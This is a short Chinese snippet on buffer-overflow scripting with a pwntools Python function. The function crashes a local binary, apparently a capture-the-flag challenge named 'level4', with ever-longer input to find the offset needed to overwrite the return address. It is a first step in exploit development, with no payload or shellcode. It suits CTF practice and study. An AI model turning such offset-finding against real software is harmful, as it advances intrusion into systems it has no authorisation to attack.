缓冲区溢出常用脚本

爆破返回地址偏移

from pwn import *

context.log_level='debug'

def find_overflow_lenth():
    i=1
    while True:
        try:
            io=process("./level4")
            io.sendline('a'*i)
            context=io.recvline()
            io.close()
            if context.startswith('Hello, World!'):
                i+=1
            else:
                return i-1
        except EOFError:
            io.close()
            return i


lenth=find_overflow_lenth()
log.info('lenth:'+hex(lenth))